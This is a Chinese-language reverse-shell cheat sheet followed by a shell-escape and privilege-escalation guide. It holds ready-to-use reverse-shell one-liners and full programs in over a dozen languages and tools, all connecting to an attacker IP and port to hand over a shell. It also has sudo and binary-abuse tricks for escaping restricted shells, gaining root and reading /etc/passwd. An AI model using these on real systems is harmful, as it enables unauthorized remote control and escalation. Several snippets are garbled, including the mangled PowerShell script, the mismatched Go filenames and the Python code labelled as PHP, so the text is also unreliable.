反向shell-备忘录
通常在获得远程代码执行之后，我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互，从实战的意义来讲，反弹shell是非常有必要的，以下将从不同的工具出发

nc
listen:

nc -nlvp PORT
connect:

nc -e /bin/sh IP PORT
or

nc -c sh IP PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
socat
listen:

socat tcp-listen:PORT -
connect:

socat exec:/bin/sh tcp:IP:PORT
交互式版本

listen:

socat file:tty,raw,echo=0 tcp-listen:PORT
connect:

socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
ncat
listen:

ncat —allow IP -vnl PORT —ssl
connect:

ncat —exec /bin/sh —ssl IP PORT
sbd
listen:

sbd -lp PORT
connect:

sbd -e /bin/sh HOST PORT
加密版版本

listen:

sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
connect:

sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
bash
TCP

bash -i >& /dev/tcp/IP/PORT 0>&1
or

bash -c ‘bash -i >& /dev/tcp/IP/PORT 0>&1’
使用工具nc udp协议:

nc -u -lvp PORT
connect:

sh -i >& /dev/udp/IP/PORT 0>&1
php
简单的php代码版本：

php -r ‘$sock=fsockopen(“IP”, PORT);exec(“/bin/sh -i <&3 >&3 2>&3”);’
完整的 PHP 脚本，带有指定要连接的 IP 地址和端口的表单：

!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“IP”, PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
或从命令行使用python -c

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”, PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”])’
Ruby
#!/usr/bin/ruby
require ‘socket’;
c=TCPSocket.new(‘IP’, PORT)
%0A#card=math&code=stdin.reopen%28c%29%0A&id=fDHzF)stdout.reopen(c)
%0A#card=math&code=stderr.reopen%28c%29%0A&id=gSxWU)stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,”rb”){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
或作为单行：

ruby -rsocket -e’f=TCPSocket.open(“IP”, PORT).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
Golang
使用源代码创建文件，运行然后删除源文件：

package main;
import”os/exec”;
import”net”;
func main() {
c, _ := net.Dial(“tcp”,”IP:PORT”);
cmd := exec.Command(“/bin/sh”);
cmd.Stdin=c;
cmd.Stdout = c;
cmd.Stderr = c;
cmd.Run()
}
保存文件，例如test.go，构建并运行：go run test.go

或者直接命令行

echo ‘package main;import”os/exec”;import”net”;func main(){c,_:=net.Dial(“tcp”,”IP:PORT”);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’ > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go
Powershell
port = ‘PORT’
function cleanup {
if ($client.Connected -eq %20%7B#card=math&code=true%29%20%7B&id=RGGKG)client.Close()}
if ($process.ExitCode -ne %20%7B#card=math&code=null%29%20%7B&id=pPkRz)process.Close()}
exit}
client.connect(port)
$stream = %0A#card=math&code=client.GetStream%28%29%0A&id=jSQHV)networkbuffer = New-Object System.Byte[] process = New-Object System.Diagnostics.Process
process.StartInfo.RedirectStandardInput = 1
process.StartInfo.RedirectStandardError = 1
process.Start()
$inputstream = outputstream = encoding = new-object System.Text.AsciiEncoding
while(%20-ne%20-1)%7B#card=math&code=outputstream.Peek%28%29%20-ne%20-1%29%7B&id=LUOqh)out += outputstream.Read())}
encoding.GetBytes(%2C0%2C#card=math&code=out%29%2C0%2C&id=EOoRs)out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not %20%7B%0Aif%20(#card=math&code=done%29%20%7B%0Aif%20%28&id=ZcWLl)client.Connected -ne %20%7Bcleanup%7D%0A#card=math&code=true%29%20%7Bcleanup%7D%0A&id=ASI8r)pos = 0; i -gt 0) -and ($pos -lt )%20%7B%0A#card=math&code=networkbuffer.Length%29%29%20%7B%0A&id=DRnkm)read = networkbuffer,networkbuffer.Length - %0A#card=math&code=pos%29%0A&id=lcuvL)pos+=pos -and ((%5D%20-contains%2010))%20%7Bbreak%7D%7D%0Aif%20(#card=math&code=pos-1%29%5D%20-contains%2010%29%29%20%7Bbreak%7D%7D%0Aif%20%28&id=g93J3)pos -gt 0) {
$string = networkbuffer,0,%0A#card=math&code=pos%29%0A&id=M9kpi)inputstream.write(%0Astart-sleep%201%0Aif%20(#card=math&code=string%29%0Astart-sleep%201%0Aif%20%28&id=FLjot)process.ExitCode -ne %20%7Bcleanup%7D%0Aelse%20%7B%0A#card=math&code=null%29%20%7Bcleanup%7D%0Aelse%20%7B%0A&id=GzhkM)out = outputstream.Read())
while(%20-ne%20-1)%7B%0A#card=math&code=outputstream.Peek%28%29%20-ne%20-1%29%7B%0A&id=sssap)out += outputstream.Read()); if ($out -eq %20%7B#card=math&code=string%29%20%7B&id=jTaHU)out = ‘’}}
encoding.GetBytes(%2C0%2C#card=math&code=out%29%2C0%2C&id=ODrpQ)out.length)
$out = string = $null}} else {cleanup}}
或作为单行：

powershell -nop -c “%3B#card=math&code=client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27IP%27%2C%20PORT%29%3B&id=XiJRN)stream = %3B%5Bbyte%5B%5D%5D#card=math&code=client.GetStream%28%29%3B%5Bbyte%5B%5D%5D&id=J5aUs)bytes = 0..65535|%{0};while(($i = bytes, 0, )%20-ne%200)%7B%3B#card=math&code=bytes.Length%29%29%20-ne%200%29%7B%3B&id=x2iFJ)data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, %3B#card=math&code=i%29%3B&id=GIQZ8)sendback = (iex %3B#card=math&code=data%202%3E%261%20%7C%20Out-String%20%29%3B&id=A4RoH)sendback2 = .Path%20%2B%20’%3E%20’%3B#card=math&code=sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B&id=UCzl0)sendbyte = ([text.encoding]::ASCII).GetBytes(%3B#card=math&code=sendback2%29%3B&id=JAVNm)stream.Write(sendbyte.Length);%7D%3B#card=math&code=stream.Flush%28%29%7D%3B&id=hmQMm)client.Close()”
nodejs
创建一个js文件

var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);
var client = new net.Socket();
client.connect(PORT, “IP”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
or

require(“child_process”).exec(‘bash -c “bash -i >& /dev/tcp/IP/PORT 0>&1”‘)
or

var x = global.process.mainModule.require
x(‘child_process’).exec(‘nc IP PORT -e /bin/bash’)
然后运行：

nodejs rev.js
或者直接执行命令

nodejs -e “require(‘child_process’).exec(‘nc -e /bin/sh IP PORT’)”
没有nc版本：

nodejs -e “require(‘child_process’).exec(‘bash -c “bash -i >& /dev/tcp/IP/PORT 0>&1”‘)”
openssl
listen：

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
connect:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s
Awk
连接到监听器，然后关闭反向shell进入exit

awk ‘BEGIN {s = “/inet/tcp/0/IP/PORT”; while(42) { do{ printf “shell>” |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != “exit”) close(s); }}’ /dev/null
Lua
lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘IP’,’PORT’);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);”
Java
Linux

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
public static void main(String[] args) {

String host=”IP”;
int port=PORT;
String cmd=”/bin/sh”;
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Windows

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
public static void main(String[] args) {

String host=”IP”;
int port=PORT;
String cmd=”cmd.exe”;
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Groovy
Linux

String host=”IP”;
int port=PORT;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}
catch (Exception e){}
};
p.destroy();
s.close();
命令行执行：

groovy -e ‘String host=”IP”;int port=PORT;String cmd=”/bin/bash”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();’
或者去通过线程去执行：

Thread.start {
String host=”IP”;
int port=PORT;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();break;
}
catch (Exception e){}
};
p.destroy();
s.close();
}
Windows

String host=”IP”;
int port=PORT;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}catch (Exception e){}
};
p.destroy();
s.close();
一行搞定：

groovy -e ‘String host=”IP”;int port=PORT;String cmd=”cmd.exe”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();’
C
创建一个文件

include
#include
#include
#include
#include
#include
#include

int main(void) {
int sockfd;
int lportno = PORT;
struct sockaddr_in serv_addr;
char const params[] = {“/bin/sh”, NULL};
char const environ[] = {NULL};

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(“IP”);
serv_addr.sin_port = htons(lportno);
connect(sockfd, (struct sockaddr *) &serv_addr, 16);

dup2(sockfd, 0);
dup2(0, 1);
dup2(0, 2);
execve(“/bin/sh”, params, environ);
}
shell-逃跑指南
Vim
:sh
:!/bin/bash
rVim
rvim —cmd “:py import os;os.system(‘/bin/bash’)”
or

:python import os; os.system(“/bin/bash”)
nano / pico
直接运行nano：

bashnano -s /bin/bash
在文本内容编辑：

/bin/bash
按下Ctrl-T运行拼写检查

man, less, more
!shell
!/bin/bash
Awk
awk ‘BEGIN {system(“/bin/sh”)}’
find
find /dev/zero -exec /bin/bash ;
rbash
bash < 4.4

BASH_CMDS[poop]=/bin/bash;poop
文件读取：

$(< ../../etc/passwd)
要么

mapfile ARRAY < ../../etc/passwd ARRAY
echo $ARRAY
通过以下方式连接时不加载配置文件ssh：

ssh user@IP-ADDRESS -t “bash —noprofile”
Python
python
echo os.system(‘/bin/bash’)
MySQL client
mysql>! bash
bash>
gdb
(gdb) ! id
(gdb) ! /bin/bash
(gdb) shell id
Netcat, ncat
nc -vlp PORT -e /bin/bash
nc HOST PORT
Nmap
nmap —script <(echo ‘os.execute(“/bin/sh”)’)
通过脚本

nmap —script /tmp/script.nse
script.nse内容为

os.execute(“id”)
tcpdump
cat < shell.sh
#!/bin/bash
/bin/bash
EOF
chmod +x shell.sh
sudo tcpdump -G 1 -z ./shell.sh -w 1.pcap
在读取文件时执行脚本，内容为test.sh：

!/bin/sh
id
创建test.pcap大于 1MB 的文件，运行tcpdump：

tcpdump -r /tmp/test.pcap -C 1 -w /dev/null -z /tmp/test.sh
tar
tar c —checkpoint=1 —checkpoint-action=exec=bash a a.tar
zip
zip /tmp/test.zip /tmp/test -T —unzip-command=”sh -c /bin/bash”
strace
strace -o/dev/null /bin/bash
except
except spawn sh then sh
SCP
cat >/tmp/shell.sh </bin/bash >&2 0>&2
EOF
chmod +x shell.sh
scp -S /tmp/shell.sh x y:
ssh
ssh -o ProxyCommand=/tmp/shell.sh localhost
git
git -c core.pager=/tmp/shell.sh —paginate help
or

git commit
或使用rebase

git rebase —exec “COMMAND” master
或者：

git rebase -ix “COMMAND” master
script
script -c /bin/bash /tmp/a
mount
user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
mail
仅限 GNU 版本：

sudo mail —exec=’!/bin/sh’
其他：

sudo -u USER mail -u USER -s xxxx aaa
~!id
sqlite
sqlite3 /dev/null ‘.shell /bin/sh’
通过加载扩展：

include
void main()
{
execl(“/bin/sh”, NULL);
}
编译为.so：

gcc -g -fPIC -shared /tmp/shell.c -o /tmp/shell.so
sqlite在shell中加载扩展：

sqlite> .load /tmp/shell.so main
socat
socat file:/bin/sh file:sh,create,perm=4755 > /dev/null
./sh
or

socat exec:/bin/sh -
apt-get / apt / aptitude
a:

apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
b:

sudo apt-get changelog apt
!/bin/sh
openssl
读取文件：

openssl enc -in test.txt
写文件：

LFILE=file_to_write
echo DATA | openssl enc -out “$LFILE”
或者

LFILE=file_to_write
TF=$(mktemp)
echo “DATA” > TF” -out “$LFILE”
Python

import pty
pty.spawn(‘/bin/bash’)
or

import os
os.system(‘ls’)
os.system(‘/bin/bash’)
Ruby
ruby -e ‘exec “/bin/sh”‘
or

irb
irb(main):001:0> exec ‘/bin/bash’
Perl
perl -e ‘exec “/bin/sh”;’
Lua
os.execute(‘/bin/sh’)
或者

lua -e ‘os.execute(“/bin/sh”)’